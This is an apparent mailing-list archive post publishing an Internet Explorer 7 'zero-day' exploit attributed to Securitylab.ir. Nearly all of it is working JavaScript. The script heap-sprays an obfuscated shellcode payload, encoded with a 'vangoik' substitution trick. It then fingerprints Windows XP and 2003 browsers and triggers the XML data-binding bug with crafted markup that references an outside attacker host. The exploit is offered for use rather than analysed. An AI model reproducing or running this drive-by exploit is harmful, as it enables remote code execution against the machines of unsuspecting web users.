[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Internet Explorer 7.0 0day Vulnerability



###############################################################################################
# Securitylab.ir
###############################################################################################
# Founded By: Unknown
# Published By: K4mr4n_st(at)yahoo(dot)com
# Special Thanks: N.S.T Security Team (Red Dragon) & Securitylab.ir
###############################################################################################

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/vangoik/g,"x25x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1="vangoik";
spray(a1+"9090"+a1+"vangoik9090vangoik9090vangoikE1D9vangoik34D9vangoik5824vangoik5858vangoik3358vangoikB3DBvangoik031Cvangoik31C3vangoik66C9vangoikE981vangoikFA65vangoik3080vangoik4021vangoikFAE2vangoik17C9vangoik2122vangoik4921vangoik0121vangoik2121vangoik214BvangoikF1DEvangoik2198vangoik2131vangoikAA21vangoikCAD9vangoik7F24vangoik85D2vangoikF1DEvangoikD7C9vangoikDEDEvangoikC9DEvangoik221Cvangoik2121vangoikD9AAvangoik19C9vangoik2121vangoikC921vangoik206Cvangoik2121vangoik67C9vangoik2121vangoikC921vangoik22FAvangoik2121vangoikD9AAvangoik03C9vangoik2121vangoikC921vangoik2065vangoik2121vangoik11C9vangoik2121vangoikC921vangoik22A8vangoik2121vangoikD9AAvangoik2DC9vangoik2121vangoikC921vangoik2040vangoik2121vangoik3BC9vangoik2121vangoikCA21vangoik7279vangoikFDAAvangoik4B72vangoik4961vangoik3121vangoik2121vangoikC976vangoik2390vangoik2121vangoikC4C9vangoik2121vangoik7921vangoik72E2vangoikFDAAvangoik4B72vangoik4901vangoik3121vangoik2121vangoikC976vangoik23B8vangoik2121vangoikECC9vangoik2121vangoik7921vangoik76E2vangoik1DC9vangoik2125vangoikAA21vangoik12D9vangoik68E8vangoikE112vangoikE291vangoikD3DDvangoikAC8FvangoikDE66vangoikE27Evangoik1F7Avangoik26E7vangoik1F99vangoik7EA8vangoik4720vangoikE61Fvangoik2466vangoikC1DEvangoikC8E2vangoik25B4vangoik2121vangoikA07Avangoik35CDvangoik2120vangoikAA21vangoik1FF5vangoik23E6vangoik4C42vangoik0145vangoikE61Fvangoik2563vangoik420Evangoik0301vangoikE3A2vangoik1229vangoik71E1vangoik4971vangoik2025vangoik2121vangoik7273vangoikC971vangoik22E0vangoik2121vangoikF1DEvangoikDDAAvangoikE6AAvangoikE1A2vangoik1F29vangoik39ABvangoikFAA5vangoik2255vangoikCA61vangoik1FD7vangoik21E7vangoik1203vangoik1FF3vangoik71A9vangoikA220vangoik75CDvangoikE112vangoikFA12vangoikEDAAvangoikD9A2vangoik5C75vangoik1F28vangoik3DA8vangoikA220vangoik25E1vangoikD3CAvangoikEDAAvangoikF8AAvangoikE2A2vangoik1231vangoik1FE1vangoik62E6vangoik200Dvangoik2121vangoik7021vangoik7172vangoik7171vangoik7171vangoik7671vangoikC971vangoik2218vangoik2121vangoik38C9vangoik2121vangoik4521vangoik2580vangoik2121vangoikAC21vangoi!
 k4181van
goikDEDEvangoikC9DEvangoik2216vangoik2121vangoikFA12vangoik7272vangoik7272vangoikF1DEvangoik19A1vangoikA1C9vangoikC819vangoik2E54vangoik59A0vangoikB124vangoikB1B1vangoik55B1vangoik7427vangoikCDAAvangoik61ACvangoikDE24vangoikC9C1vangoikDE0FvangoikDEDEvangoikC9E2vangoikDE09vangoikDEDEvangoik3099vangoik2520vangoikE3A1vangoik212Dvangoik3AC9vangoikDEDEvangoik12DEvangoik71E1vangoikC975vangoik2175vangoik2121vangoikC971vangoik23AAvangoik2121vangoikF1DEvangoikA117vangoik051Dvangoik5621vangoikC92Bvangoik2360vangoik2121vangoikDE12vangoikDE76vangoikC9F1vangoik20DAvangoik2121vangoikDE49vangoik2121vangoikDE21vangoikC9F1vangoikDFC9vangoikDEDEvangoik7672vangoik1277vangoik71E1vangoikC975vangoik213Fvangoik2121vangoikC971vangoik2374vangoik2121vangoikF1DEvangoikA117vangoik051Dvangoik5621vangoikC92Bvangoik232Avangoik2121vangoikDE12vangoikDE76vangoik79F1vangoik7E7FvangoikE27Avangoik23CAvangoikE279vangoikD8C9vangoikDEDEvangoik77DEvangoikA276vangoik29CDvangoikDDAAvangoik294Bvangoik1F76vangoik56DEvangoikC935vangoik237Cvangoik2121vangoikF1DEvangoikDDAAvangoik4049vangoik444Cvangoik4921vangoik6468vangoik5367vangoikD5AAvangoik2998vangoik2121vangoikD221vangoik5487vangoik4B0Evangoik1F21vangoik55DEvangoik0105vangoik05C9vangoik2123vangoikDE21vangoikAAF1vangoikC9D9vangoik20EAvangoik2121vangoikF1DEvangoikD91Avangoik2955vangoikAA17vangoik0565vangoik1F01vangoik21DEvangoikDE1Fvangoik0555vangoikC93Dvangoik20CEvangoik2121vangoikF1DEvangoikE5A2vangoik7E31vangoik997Fvangoik2120vangoik2121vangoik49E2vangoik4F4Evangoik2121vangoik5449vangoik4D53vangoikCA4CvangoikAC34vangoik0565vangoik7125vangoik03C9vangoikDEDFvangoik71DEvangoik6BC9vangoik2123vangoikC821vangoikDFC3vangoikDEDEvangoikC7C9vangoikDEDEvangoikA2DEvangoik29E5vangoik4BE2vangoik494Dvangoik554Fvangoik4D45vangoik34CAvangoik65ACvangoik2505vangoikC971vangoikDCDAvangoikDEDEvangoikC971vangoik2302vangoik2121vangoik9AC8vangoikDEDFvangoikC9DEvangoikDEC7vangoikDEDEvangoikE5A2vangoikE229vangoik1249vangoik2113vangoik4921vangoik5254vangoik5344vangoik34CAvangoik65ACvangoik2505vangoikC971vangoikDCF0vangoik!
 DEDEvang
oikC971vangoik20D8vangoik2121vangoikB0C8vangoikDEDFvangoikC9DEvangoikDEC7vangoikDEDEvangoikE5A2vangoikE229vangoik4249vangoik5657vangoik4921vangoik4952vangoik4E45vangoik34CAvangoik65ACvangoik2505vangoikC971vangoikDC86vangoikDEDEvangoikC971vangoik20EEvangoik2121vangoik46C8vangoikDEDFvangoikC9DEvangoikDEC7vangoikDEDEvangoikE5A2vangoikE229vangoik5749vangoik5946vangoikCA21vangoikAC34vangoik0565vangoik7125vangoikA3C9vangoikDEDCvangoik71DEvangoik8BC9vangoik2120vangoikC821vangoikDF63vangoikDEDEvangoikC7C9vangoikDEDEvangoikA2DEvangoik25E5vangoikC9E2vangoik208Avangoik2121vangoik3A49vangoik67E7vangoik7158vangoikE7C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik20B6vangoik2121vangoikCD49vangoik22B6vangoik712Dvangoik93C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik20A2vangoik2121vangoik8B49vangoik2CDDvangoik715DvangoikBFC9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik204Evangoik2121vangoikCC49vangoikCE77vangoik7117vangoikABC9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik207Avangoik2121vangoikD149vangoik25ABvangoik717Evangoik57C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoikDFD6vangoikDEDEvangoik5949vangoikFA49vangoik713Dvangoik43C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik2012vangoik2121vangoikCE49vangoikC1EFvangoik7141vangoik6FC9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik203Evangoik2121vangoik9149vangoik0C68vangoik71FAvangoik1BC9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoikDE17vangoikDEDEvangoik8A49vangoikBA7Fvangoik713Fvangoik07C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoikDF86vangoikDEDEvangoik7849vangoikA0B6vangoik7123vangoik33C9vangoik2120vangoikA221vangoik29E5vangoikC9E2vangoik21C2vangoik2121vangoik5F49vangoikC3F9vangoik7152vangoikDFC9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoik21EEvangoik2121vangoikBF49vangoik9AD8vangoik7114vangoikCBC9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDFB3vangoikDEDEvangoik7649vangoik9481vangoik719AvangoikF7C9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF5FvangoikDEDEvangoik3B49vangoik3F5Bvangoik7123vangoikE!
 3C9vango
ik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF4BvangoikDEDEvangoikC149vangoik117Avangoik71B5vangoik8FC9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF77vangoikDEDEvangoikB649vangoikC3E8vangoik7182vangoikBBC9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF63vangoikDEDEvangoik4949vangoikE405vangoik7192vangoikA7C9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoik2176vangoik2121vangoik5349vangoik92DFvangoik7137vangoik53C9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoikDF65vangoikDEDEvangoik32CAvangoik444BvangoikC971vangoikDAD6vangoikDEDEvangoikC971vangoikDF8AvangoikDEDEvangoik96C8vangoikDEDDvangoikC9DEvangoikDEC9vangoikDEDEvangoikC9E2vangoikDC88vangoikDEDEvangoik6E49vangoik6ECEvangoik7124vangoik1FC9vangoik2121vangoikA221vangoik29E5vangoikC9E2vangoik212Evangoik2121vangoikAF49vangoik2F6Fvangoik71CDvangoik0BC9vangoik2121vangoikA221vangoik29E5vangoik12E2vangoik45E1vangoik61AAvangoikA411vangoik59E1vangoik1F31vangoik61AAvangoik1F2Dvangoik51AAvangoik8C3DvangoikAA1Fvangoik2961vangoikCAE2vangoik1F2Avangoik61AAvangoikA215vangoik5DE1vangoikAA1Fvangoik1D61vangoik41E2vangoikAA17vangoik054Dvangoik1705vangoik64AAvangoik171Dvangoik75AAvangoik5924vangoikF422vangoikAA1Fvangoik396BvangoikAA1Fvangoik017BvangoikFC22vangoik1AC2vangoik1F68vangoik15AAvangoik22AAvangoik12D4vangoik12DEvangoikDDE1vangoikA58Dvangoik55E1vangoikE026vangoik2CEEvangoikD922vangoikD5CAvangoik1A17vangoik055Dvangoik5409vangoik1FFEvangoik7BAAvangoik2205vangoik47FCvangoikAA1Fvangoik6A2DvangoikAA1Fvangoik3D7BvangoikFC22vangoikAA1FvangoikAA25vangoikE422vangoikA817vangoik0565vangoik403DvangoikC9E2vangoikDA47vangoikDEDEvangoik5549vangoik5155vangoik0E1Bvangoik560Evangoik5656vangoik430Fvangoik4840vangoik444Avangoik0F42vangoik4F42vangoik450Evangoik564Evangoik0E4Fvangoik4E4Avangoik440Fvangoik4459vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik21!
 21vangoi
k2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik2121vangoik0021");

sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://v&#6023;.k4mr4n.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>